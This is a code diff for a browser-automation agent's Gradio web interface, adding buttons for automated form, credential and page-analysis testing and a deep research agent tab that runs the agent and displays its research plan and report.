| 1071 |
+
auto_report_status = gr.Textbox(
|
| 1072 |
+
label="📊 Report Status",
|
| 1073 |
+
value="Report will be generated automatically after testing completion",
|
| 1074 |
+
interactive=False,
|
| 1075 |
+
visible=True
|
| 1076 |
+
)
|
| 1077 |
+
|
| 1078 |
+
# --- Store Components in Manager ---
|
| 1079 |
+
tab_components.update(
|
| 1080 |
+
dict(
|
| 1081 |
+
chatbot=chatbot,
|
| 1082 |
+
user_input=user_input,
|
| 1083 |
+
clear_button=clear_button,
|
| 1084 |
+
run_button=run_button,
|
| 1085 |
+
stop_button=stop_button,
|
| 1086 |
+
pause_resume_button=pause_resume_button,
|
| 1087 |
+
intelligent_form_test_btn=intelligent_form_test_btn,
|
| 1088 |
+
intelligent_credential_test_btn=intelligent_credential_test_btn,
|
| 1089 |
+
ai_analysis_btn=ai_analysis_btn,
|
| 1090 |
+
comprehensive_test_btn=comprehensive_test_btn,
|
| 1091 |
+
agent_history_file=agent_history_file,
|
| 1092 |
+
recording_gif=recording_gif,
|
| 1093 |
+
browser_view=browser_view,
|
| 1094 |
+
auto_pdf_report=auto_pdf_report,
|
| 1095 |
+
auto_report_status=auto_report_status,
|
| 1096 |
+
)
|
| 1097 |
+
)
|
| 1098 |
+
webui_manager.add_components(
|
| 1099 |
+
"browser_use_agent", tab_components
|
| 1100 |
+
) # Use "browser_use_agent" as tab_name prefix
|
| 1101 |
+
|
| 1102 |
+
all_managed_components = set(
|
| 1103 |
+
webui_manager.get_components()
|
| 1104 |
+
) # Get all components known to manager
|
| 1105 |
+
run_tab_outputs = list(tab_components.values())
|
| 1106 |
+
|
| 1107 |
+
async def submit_wrapper(
|
| 1108 |
+
components_dict: Dict[Component, Any],
|
| 1109 |
+
) -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1110 |
+
"""Wrapper for handle_submit that yields its results."""
|
| 1111 |
+
async for update in handle_submit(webui_manager, components_dict):
|
| 1112 |
+
yield update
|
| 1113 |
+
|
| 1114 |
+
async def stop_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1115 |
+
"""Wrapper for handle_stop."""
|
| 1116 |
+
update_dict = await handle_stop(webui_manager)
|
| 1117 |
+
yield update_dict
|
| 1118 |
+
|
| 1119 |
+
async def pause_resume_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1120 |
+
"""Wrapper for handle_pause_resume."""
|
| 1121 |
+
update_dict = await handle_pause_resume(webui_manager)
|
| 1122 |
+
yield update_dict
|
| 1123 |
+
|
| 1124 |
+
async def clear_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1125 |
+
"""Wrapper for handle_clear."""
|
| 1126 |
+
update_dict = await handle_clear(webui_manager)
|
| 1127 |
+
yield update_dict
|
| 1128 |
+
|
| 1129 |
+
# Intelligent Testing Handlers
|
| 1130 |
+
async def intelligent_form_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1131 |
+
"""Wrapper for intelligent form testing."""
|
| 1132 |
+
try:
|
| 1133 |
+
webui_manager.bu_chat_history.append({
|
| 1134 |
+
"role": "assistant",
|
| 1135 |
+
"content": "🔍 Starting intelligent form testing... This will discover form fields and test various scenarios automatically."
|
| 1136 |
+
})
|
| 1137 |
+
|
| 1138 |
+
if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_intelligent_form_testing'):
|
| 1139 |
+
result = await webui_manager.bu_agent.run_intelligent_form_testing()
|
| 1140 |
+
|
| 1141 |
+
if "error" in result:
|
| 1142 |
+
webui_manager.bu_chat_history.append({
|
| 1143 |
+
"role": "assistant",
|
| 1144 |
+
"content": f"❌ Form testing error: {result['error']}"
|
| 1145 |
+
})
|
| 1146 |
+
else:
|
| 1147 |
+
summary = result.get('summary', {})
|
| 1148 |
+
webui_manager.bu_chat_history.append({
|
| 1149 |
+
"role": "assistant",
|
| 1150 |
+
"content": f"✅ Form testing complete!\n\n📊 Results:\n- Total Tests: {summary.get('total_tests', 0)}\n- Passed: {summary.get('passed_tests', 0)}\n- Failed: {summary.get('failed_tests', 0)}\n- Success Rate: {summary.get('success_rate', 0)}%"
|
| 1151 |
+
})
|
| 1152 |
+
else:
|
| 1153 |
+
webui_manager.bu_chat_history.append({
|
| 1154 |
+
"role": "assistant",
|
| 1155 |
+
"content": "❌ Intelligent form testing not available. Please run a regular task first to initialize the agent."
|
| 1156 |
+
})
|
| 1157 |
+
except Exception as e:
|
| 1158 |
+
webui_manager.bu_chat_history.append({
|
| 1159 |
+
"role": "assistant",
|
| 1160 |
+
"content": f"❌ Error in form testing: {str(e)}"
|
| 1161 |
+
})
|
| 1162 |
+
|
| 1163 |
+
yield {chatbot: webui_manager.bu_chat_history}
|
| 1164 |
+
|
| 1165 |
+
async def intelligent_credential_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1166 |
+
"""Wrapper for intelligent credential testing."""
|
| 1167 |
+
try:
|
| 1168 |
+
webui_manager.bu_chat_history.append({
|
| 1169 |
+
"role": "assistant",
|
| 1170 |
+
"content": "🔐 Starting intelligent credential testing... This will test various email/password combinations and security scenarios."
|
| 1171 |
+
})
|
| 1172 |
+
|
| 1173 |
+
if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_intelligent_credential_testing'):
|
| 1174 |
+
result = await webui_manager.bu_agent.run_intelligent_credential_testing()
|
| 1175 |
+
|
| 1176 |
+
if "error" in result:
|
| 1177 |
+
webui_manager.bu_chat_history.append({
|
| 1178 |
+
"role": "assistant",
|
| 1179 |
+
"content": f"❌ Credential testing error: {result['error']}"
|
| 1180 |
+
})
|
| 1181 |
+
else:
|
| 1182 |
+
summary = result.get('summary', {})
|
| 1183 |
+
webui_manager.bu_chat_history.append({
|
| 1184 |
+
"role": "assistant",
|
| 1185 |
+
"content": f"✅ Credential testing complete!\n\n📊 Results:\n- Total Tests: {summary.get('total_tests', 0)}\n- Passed: {summary.get('passed_tests', 0)}\n- Failed: {summary.get('failed_tests', 0)}\n- Success Rate: {summary.get('success_rate', 0)}%"
|
| 1186 |
+
})
|
| 1187 |
+
else:
|
| 1188 |
+
webui_manager.bu_chat_history.append({
|
| 1189 |
+
"role": "assistant",
|
| 1190 |
+
"content": "❌ Intelligent credential testing not available. Please run a regular task first to initialize the agent."
|
| 1191 |
+
})
|
| 1192 |
+
except Exception as e:
|
| 1193 |
+
webui_manager.bu_chat_history.append({
|
| 1194 |
+
"role": "assistant",
|
| 1195 |
+
"content": f"❌ Error in credential testing: {str(e)}"
|
| 1196 |
+
})
|
| 1197 |
+
|
| 1198 |
+
yield {chatbot: webui_manager.bu_chat_history}
|
| 1199 |
+
|
| 1200 |
+
async def ai_analysis_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1201 |
+
"""Wrapper for AI page analysis."""
|
| 1202 |
+
try:
|
| 1203 |
+
webui_manager.bu_chat_history.append({
|
| 1204 |
+
"role": "assistant",
|
| 1205 |
+
"content": "🤔 Starting AI page analysis... This will intelligently analyze the current page and generate testing strategies."
|
| 1206 |
+
})
|
| 1207 |
+
|
| 1208 |
+
if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_ai_thinking_analysis'):
|
| 1209 |
+
result = await webui_manager.bu_agent.run_ai_thinking_analysis()
|
| 1210 |
+
|
| 1211 |
+
if "error" in result:
|
| 1212 |
+
webui_manager.bu_chat_history.append({
|
| 1213 |
+
"role": "assistant",
|
| 1214 |
+
"content": f"❌ AI analysis error: {result['error']}"
|
| 1215 |
+
})
|
| 1216 |
+
else:
|
| 1217 |
+
page_analysis = result.get('page_analysis', {})
|
| 1218 |
+
strategy = result.get('testing_strategy', {})
|
| 1219 |
+
|
| 1220 |
+
analysis_text = f"✅ AI analysis complete!\n\n"
|
| 1221 |
+
analysis_text += f"📄 Page Type: {page_analysis.get('page_type', 'Unknown')}\n"
|
| 1222 |
+
analysis_text += f"📝 Form Complexity: {page_analysis.get('form_complexity', 'Unknown')}\n"
|
| 1223 |
+
analysis_text += f"🔒 Security Indicators: {len(page_analysis.get('security_indicators', []))}\n"
|
| 1224 |
+
analysis_text += f"⚠️ Potential Issues: {len(page_analysis.get('potential_issues', []))}\n\n"
|
| 1225 |
+
analysis_text += f"🎯 Testing Strategy:\n"
|
| 1226 |
+
analysis_text += f"- Approach: {strategy.get('approach', 'Unknown')}\n"
|
| 1227 |
+
analysis_text += f"- Focus Areas: {', '.join(strategy.get('focus_areas', []))}\n"
|
| 1228 |
+
analysis_text += f"- Estimated Duration: {strategy.get('estimated_duration', 0)} minutes\n"
|
| 1229 |
+
|
| 1230 |
+
webui_manager.bu_chat_history.append({
|
| 1231 |
+
"role": "assistant",
|
| 1232 |
+
"content": analysis_text
|
| 1233 |
+
})
|
| 1234 |
+
else:
|
| 1235 |
+
webui_manager.bu_chat_history.append({
|
| 1236 |
+
"role": "assistant",
|
| 1237 |
+
"content": "❌ AI analysis not available. Please run a regular task first to initialize the agent."
|
| 1238 |
+
})
|
| 1239 |
+
except Exception as e:
|
| 1240 |
+
webui_manager.bu_chat_history.append({
|
| 1241 |
+
"role": "assistant",
|
| 1242 |
+
"content": f"❌ Error in AI analysis: {str(e)}"
|
| 1243 |
+
})
|
| 1244 |
+
|
| 1245 |
+
yield {chatbot: webui_manager.bu_chat_history}
|
| 1246 |
+
|
| 1247 |
+
async def comprehensive_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 1248 |
+
"""Wrapper for comprehensive intelligent testing."""
|
| 1249 |
+
try:
|
| 1250 |
+
webui_manager.bu_chat_history.append({
|
| 1251 |
+
"role": "assistant",
|
| 1252 |
+
"content": "🎯 Starting comprehensive intelligent testing... This will run all intelligent testing features including AI analysis, form testing, and credential testing."
|
| 1253 |
+
})
|
| 1254 |
+
|
| 1255 |
+
if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_comprehensive_intelligent_testing'):
|
| 1256 |
+
result = await webui_manager.bu_agent.run_comprehensive_intelligent_testing()
|
| 1257 |
+
|
| 1258 |
+
if "error" in result:
|
| 1259 |
+
webui_manager.bu_chat_history.append({
|
| 1260 |
+
"role": "assistant",
|
| 1261 |
+
"content": f"❌ Comprehensive testing error: {result['error']}"
|
| 1262 |
+
})
|
| 1263 |
+
else:
|
| 1264 |
+
summary = result.get('summary', {})
|
| 1265 |
+
webui_manager.bu_chat_history.append({
|
| 1266 |
+
"role": "assistant",
|
| 1267 |
+
"content": f"✅ Comprehensive intelligent testing complete!\n\n📊 Summary:\n- AI Analysis: {'✅' if summary.get('ai_analysis_success') else '❌'}\n- Form Testing: {'✅' if summary.get('form_testing_success') else '❌'}\n- Credential Testing: {'✅' if summary.get('credential_testing_success') else '❌'}\n\nAll intelligent testing features have been executed. Check the detailed results above."
|
| 1268 |
+
})
|
| 1269 |
+
else:
|
| 1270 |
+
webui_manager.bu_chat_history.append({
|
| 1271 |
+
"role": "assistant",
|
| 1272 |
+
"content": "❌ Comprehensive intelligent testing not available. Please run a regular task first to initialize the agent."
|
| 1273 |
+
})
|
| 1274 |
+
except Exception as e:
|
| 1275 |
+
webui_manager.bu_chat_history.append({
|
| 1276 |
+
"role": "assistant",
|
| 1277 |
+
"content": f"❌ Error in comprehensive testing: {str(e)}"
|
| 1278 |
+
})
|
| 1279 |
+
|
| 1280 |
+
yield {chatbot: webui_manager.bu_chat_history}
|
| 1281 |
+
|
| 1282 |
+
# --- Connect Event Handlers using the Wrappers --
|
| 1283 |
+
run_button.click(
|
| 1284 |
+
fn=submit_wrapper, inputs=all_managed_components, outputs=run_tab_outputs, trigger_mode="multiple"
|
| 1285 |
+
)
|
| 1286 |
+
user_input.submit(
|
| 1287 |
+
fn=submit_wrapper, inputs=all_managed_components, outputs=run_tab_outputs
|
| 1288 |
+
)
|
| 1289 |
+
stop_button.click(fn=stop_wrapper, inputs=None, outputs=run_tab_outputs)
|
| 1290 |
+
pause_resume_button.click(
|
| 1291 |
+
fn=pause_resume_wrapper, inputs=None, outputs=run_tab_outputs
|
| 1292 |
+
)
|
| 1293 |
+
clear_button.click(fn=clear_wrapper, inputs=None, outputs=run_tab_outputs)
|
| 1294 |
+
|
| 1295 |
+
# Intelligent Testing Button Handlers
|
| 1296 |
+
intelligent_form_test_btn.click(fn=intelligent_form_test_wrapper, inputs=None, outputs=run_tab_outputs)
|
| 1297 |
+
intelligent_credential_test_btn.click(fn=intelligent_credential_test_wrapper, inputs=None, outputs=run_tab_outputs)
|
| 1298 |
+
ai_analysis_btn.click(fn=ai_analysis_wrapper, inputs=None, outputs=run_tab_outputs)
|
| 1299 |
+
comprehensive_test_btn.click(fn=comprehensive_test_wrapper, inputs=None, outputs=run_tab_outputs)
|
src/webui/components/deep_research_agent_tab.py
ADDED
|
@@ -0,0 +1,457 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import gradio as gr
|
| 2 |
+
from gradio.components import Component
|
| 3 |
+
from functools import partial
|
| 4 |
+
|
| 5 |
+
from src.webui.webui_manager import WebuiManager
|
| 6 |
+
from src.utils import config
|
| 7 |
+
import logging
|
| 8 |
+
import os
|
| 9 |
+
from typing import Any, Dict, AsyncGenerator, Optional, Tuple, Union
|
| 10 |
+
import asyncio
|
| 11 |
+
import json
|
| 12 |
+
from src.agent.deep_research.deep_research_agent import DeepResearchAgent
|
| 13 |
+
from src.utils import llm_provider
|
| 14 |
+
|
| 15 |
+
logger = logging.getLogger(__name__)
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
async def _initialize_llm(provider: Optional[str], model_name: Optional[str], temperature: float,
|
| 19 |
+
base_url: Optional[str], api_key: Optional[str], num_ctx: Optional[int] = None):
|
| 20 |
+
"""Initializes the LLM based on settings. Returns None if provider/model is missing."""
|
| 21 |
+
if not provider or not model_name:
|
| 22 |
+
logger.info("LLM Provider or Model Name not specified, LLM will be None.")
|
| 23 |
+
return None
|
| 24 |
+
try:
|
| 25 |
+
logger.info(f"Initializing LLM: Provider={provider}, Model={model_name}, Temp={temperature}")
|
| 26 |
+
# Use your actual LLM provider logic here
|
| 27 |
+
llm = llm_provider.get_llm_model(
|
| 28 |
+
provider=provider,
|
| 29 |
+
model_name=model_name,
|
| 30 |
+
temperature=temperature,
|
| 31 |
+
base_url=base_url or None,
|
| 32 |
+
api_key=api_key or None,
|
| 33 |
+
num_ctx=num_ctx if provider == "ollama" else None
|
| 34 |
+
)
|
| 35 |
+
return llm
|
| 36 |
+
except Exception as e:
|
| 37 |
+
logger.error(f"Failed to initialize LLM: {e}", exc_info=True)
|
| 38 |
+
gr.Warning(
|
| 39 |
+
f"Failed to initialize LLM '{model_name}' for provider '{provider}'. Please check settings. Error: {e}")
|
| 40 |
+
return None
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
def _read_file_safe(file_path: str) -> Optional[str]:
|
| 44 |
+
"""Safely read a file, returning None if it doesn't exist or on error."""
|
| 45 |
+
if not os.path.exists(file_path):
|
| 46 |
+
return None
|
| 47 |
+
try:
|
| 48 |
+
with open(file_path, 'r', encoding='utf-8') as f:
|
| 49 |
+
return f.read()
|
| 50 |
+
except Exception as e:
|
| 51 |
+
logger.error(f"Error reading file {file_path}: {e}")
|
| 52 |
+
return None
|
| 53 |
+
|
| 54 |
+
|
| 55 |
+
# --- Deep Research Agent Specific Logic ---
|
| 56 |
+
|
| 57 |
+
async def run_deep_research(webui_manager: WebuiManager, components: Dict[Component, Any]) -> AsyncGenerator[
|
| 58 |
+
Dict[Component, Any], None]:
|
| 59 |
+
"""Handles initializing and running the DeepResearchAgent."""
|
| 60 |
+
|
| 61 |
+
# --- Get Components ---
|
| 62 |
+
research_task_comp = webui_manager.get_component_by_id("deep_research_agent.research_task")
|
| 63 |
+
resume_task_id_comp = webui_manager.get_component_by_id("deep_research_agent.resume_task_id")
|
| 64 |
+
parallel_num_comp = webui_manager.get_component_by_id("deep_research_agent.parallel_num")
|
| 65 |
+
save_dir_comp = webui_manager.get_component_by_id(
|
| 66 |
+
"deep_research_agent.max_query") # Note: component ID seems misnamed in original code
|
| 67 |
+
start_button_comp = webui_manager.get_component_by_id("deep_research_agent.start_button")
|
| 68 |
+
stop_button_comp = webui_manager.get_component_by_id("deep_research_agent.stop_button")
|
| 69 |
+
markdown_display_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_display")
|
| 70 |
+
markdown_download_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_download")
|
| 71 |
+
mcp_server_config_comp = webui_manager.get_component_by_id("deep_research_agent.mcp_server_config")
|
| 72 |
+
|
| 73 |
+
# --- 1. Get Task and Settings ---
|
| 74 |
+
task_topic = components.get(research_task_comp, "").strip()
|
| 75 |
+
task_id_to_resume = components.get(resume_task_id_comp, "").strip() or None
|
| 76 |
+
max_parallel_agents = int(components.get(parallel_num_comp, 1))
|
| 77 |
+
base_save_dir = components.get(save_dir_comp, "./tmp/deep_research").strip()
|
| 78 |
+
safe_root_dir = "./tmp/deep_research"
|
| 79 |
+
normalized_base_save_dir = os.path.abspath(os.path.normpath(base_save_dir))
|
| 80 |
+
if os.path.commonpath([normalized_base_save_dir, os.path.abspath(safe_root_dir)]) != os.path.abspath(safe_root_dir):
|
| 81 |
+
logger.warning(f"Unsafe base_save_dir detected: {base_save_dir}. Using default directory.")
|
| 82 |
+
normalized_base_save_dir = os.path.abspath(safe_root_dir)
|
| 83 |
+
base_save_dir = normalized_base_save_dir
|
| 84 |
+
mcp_server_config_str = components.get(mcp_server_config_comp)
|
| 85 |
+
mcp_config = json.loads(mcp_server_config_str) if mcp_server_config_str else None
|
| 86 |
+
|
| 87 |
+
if not task_topic:
|
| 88 |
+
gr.Warning("Please enter a research task.")
|
| 89 |
+
yield {start_button_comp: gr.update(interactive=True)} # Re-enable start button
|
| 90 |
+
return
|
| 91 |
+
|
| 92 |
+
# Store base save dir for stop handler
|
| 93 |
+
webui_manager.dr_save_dir = base_save_dir
|
| 94 |
+
os.makedirs(base_save_dir, exist_ok=True)
|
| 95 |
+
|
| 96 |
+
# --- 2. Initial UI Update ---
|
| 97 |
+
yield {
|
| 98 |
+
start_button_comp: gr.update(value="⏳ Running...", interactive=False),
|
| 99 |
+
stop_button_comp: gr.update(interactive=True),
|
| 100 |
+
research_task_comp: gr.update(interactive=False),
|
| 101 |
+
resume_task_id_comp: gr.update(interactive=False),
|
| 102 |
+
parallel_num_comp: gr.update(interactive=False),
|
| 103 |
+
save_dir_comp: gr.update(interactive=False),
|
| 104 |
+
markdown_display_comp: gr.update(value="Starting research..."),
|
| 105 |
+
markdown_download_comp: gr.update(value=None, interactive=False)
|
| 106 |
+
}
|
| 107 |
+
|
| 108 |
+
agent_task = None
|
| 109 |
+
running_task_id = None
|
| 110 |
+
plan_file_path = None
|
| 111 |
+
report_file_path = None
|
| 112 |
+
last_plan_content = None
|
| 113 |
+
last_plan_mtime = 0
|
| 114 |
+
|
| 115 |
+
try:
|
| 116 |
+
# --- 3. Get LLM and Browser Config from other tabs ---
|
| 117 |
+
# Access settings values via components dict, getting IDs from webui_manager
|
| 118 |
+
def get_setting(tab: str, key: str, default: Any = None):
|
| 119 |
+
comp = webui_manager.id_to_component.get(f"{tab}.{key}")
|
| 120 |
+
return components.get(comp, default) if comp else default
|
| 121 |
+
|
| 122 |
+
# LLM Config (from agent_settings tab)
|
| 123 |
+
llm_provider_name = get_setting("agent_settings", "llm_provider")
|
| 124 |
+
llm_model_name = get_setting("agent_settings", "llm_model_name")
|
| 125 |
+
llm_temperature = max(get_setting("agent_settings", "llm_temperature", 0.5), 0.5)
|
| 126 |
+
llm_base_url = get_setting("agent_settings", "llm_base_url")
|
| 127 |
+
llm_api_key = get_setting("agent_settings", "llm_api_key")
|
| 128 |
+
ollama_num_ctx = get_setting("agent_settings", "ollama_num_ctx")
|
| 129 |
+
|
| 130 |
+
llm = await _initialize_llm(
|
| 131 |
+
llm_provider_name, llm_model_name, llm_temperature, llm_base_url, llm_api_key,
|
| 132 |
+
ollama_num_ctx if llm_provider_name == "ollama" else None
|
| 133 |
+
)
|
| 134 |
+
if not llm:
|
| 135 |
+
raise ValueError("LLM Initialization failed. Please check Agent Settings.")
|
| 136 |
+
|
| 137 |
+
# Browser Config (from browser_settings tab)
|
| 138 |
+
# Note: DeepResearchAgent constructor takes a dict, not full Browser/Context objects
|
| 139 |
+
browser_config_dict = {
|
| 140 |
+
"headless": get_setting("browser_settings", "headless", False),
|
| 141 |
+
"disable_security": get_setting("browser_settings", "disable_security", False),
|
| 142 |
+
"browser_binary_path": get_setting("browser_settings", "browser_binary_path"),
|
| 143 |
+
"user_data_dir": get_setting("browser_settings", "browser_user_data_dir"),
|
| 144 |
+
"window_width": int(get_setting("browser_settings", "window_w", 1280)),
|
| 145 |
+
"window_height": int(get_setting("browser_settings", "window_h", 1100)),
|
| 146 |
+
# Add other relevant fields if DeepResearchAgent accepts them
|
| 147 |
+
}
|
| 148 |
+
|
| 149 |
+
# --- 4. Initialize or Get Agent ---
|
| 150 |
+
if not webui_manager.dr_agent:
|
| 151 |
+
webui_manager.dr_agent = DeepResearchAgent(
|
| 152 |
+
llm=llm,
|
| 153 |
+
browser_config=browser_config_dict,
|
| 154 |
+
mcp_server_config=mcp_config
|
| 155 |
+
)
|
| 156 |
+
logger.info("DeepResearchAgent initialized.")
|
| 157 |
+
|
| 158 |
+
# --- 5. Start Agent Run ---
|
| 159 |
+
agent_run_coro = webui_manager.dr_agent.run(
|
| 160 |
+
topic=task_topic,
|
| 161 |
+
task_id=task_id_to_resume,
|
| 162 |
+
save_dir=base_save_dir,
|
| 163 |
+
max_parallel_browsers=max_parallel_agents
|
| 164 |
+
)
|
| 165 |
+
agent_task = asyncio.create_task(agent_run_coro)
|
| 166 |
+
webui_manager.dr_current_task = agent_task
|
| 167 |
+
|
| 168 |
+
# Wait briefly for the agent to start and potentially create the task ID/folder
|
| 169 |
+
await asyncio.sleep(1.0)
|
| 170 |
+
|
| 171 |
+
# Determine the actual task ID being used (agent sets this)
|
| 172 |
+
running_task_id = webui_manager.dr_agent.current_task_id
|
| 173 |
+
if not running_task_id:
|
| 174 |
+
# Agent might not have set it yet, try to get from result later? Risky.
|
| 175 |
+
# Or derive from resume_task_id if provided?
|
| 176 |
+
running_task_id = task_id_to_resume
|
| 177 |
+
if not running_task_id:
|
| 178 |
+
logger.warning("Could not determine running task ID immediately.")
|
| 179 |
+
# We can still monitor, but might miss initial plan if ID needed for path
|
| 180 |
+
else:
|
| 181 |
+
logger.info(f"Assuming task ID based on resume ID: {running_task_id}")
|
| 182 |
+
else:
|
| 183 |
+
logger.info(f"Agent started with Task ID: {running_task_id}")
|
| 184 |
+
|
| 185 |
+
webui_manager.dr_task_id = running_task_id # Store for stop handler
|
| 186 |
+
|
| 187 |
+
# --- 6. Monitor Progress via research_plan.md ---
|
| 188 |
+
if running_task_id:
|
| 189 |
+
task_specific_dir = os.path.join(base_save_dir, str(running_task_id))
|
| 190 |
+
plan_file_path = os.path.join(task_specific_dir, "research_plan.md")
|
| 191 |
+
report_file_path = os.path.join(task_specific_dir, "report.md")
|
| 192 |
+
logger.info(f"Monitoring plan file: {plan_file_path}")
|
| 193 |
+
else:
|
| 194 |
+
logger.warning("Cannot monitor plan file: Task ID unknown.")
|
| 195 |
+
plan_file_path = None
|
| 196 |
+
last_plan_content = None
|
| 197 |
+
while not agent_task.done():
|
| 198 |
+
update_dict = {}
|
| 199 |
+
update_dict[resume_task_id_comp] = gr.update(value=running_task_id)
|
| 200 |
+
agent_stopped = getattr(webui_manager.dr_agent, 'stopped', False)
|
| 201 |
+
if agent_stopped:
|
| 202 |
+
logger.info("Stop signal detected from agent state.")
|
| 203 |
+
break # Exit monitoring loop
|
| 204 |
+
|
| 205 |
+
# Check and update research plan display
|
| 206 |
+
if plan_file_path:
|
| 207 |
+
try:
|
| 208 |
+
current_mtime = os.path.getmtime(plan_file_path) if os.path.exists(plan_file_path) else 0
|
| 209 |
+
if current_mtime > last_plan_mtime:
|
| 210 |
+
logger.info(f"Detected change in {plan_file_path}")
|
| 211 |
+
plan_content = _read_file_safe(plan_file_path)
|
| 212 |
+
if last_plan_content is None or (
|
| 213 |
+
plan_content is not None and plan_content != last_plan_content):
|
| 214 |
+
update_dict[markdown_display_comp] = gr.update(value=plan_content)
|
| 215 |
+
last_plan_content = plan_content
|
| 216 |
+
